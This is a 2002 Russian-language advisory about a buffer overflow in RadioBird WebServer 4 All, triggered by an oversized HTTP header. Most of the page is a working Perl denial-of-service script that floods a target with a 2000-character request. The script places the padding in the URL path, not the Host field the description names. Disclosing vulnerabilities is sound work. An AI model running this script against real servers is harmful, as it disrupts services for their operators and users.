Переполнение буфера в RadioBird Software WebServer 4 All
| Дата публикации: | 25.10.2002 |
| Всего просмотров: | 1141 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | WebServer 4 All (http://www.freeware.lt/) – бесплатный, быстрый HTTP сервер от RadioBird Software.
Переполнение буфера в WebServer 4 All обнаружено при попытке обработать чрезмерно больше поле HTTP заголовка 'Host:' (более 2000 символов). Уязвимость позволяет выполнять произвольные команды с привилегиями процесса WebServer 4 All уязвимость обнаружена в RadioBird Software WebServer 4 All 1.23-1.28 DoS эксплоит:
#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;
print "Web Server 4 Everyone v1.28
Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";
print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";
close($socket);
print "\nConnection closed. Finished.\n\n";
|
| Ссылки: | [SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability |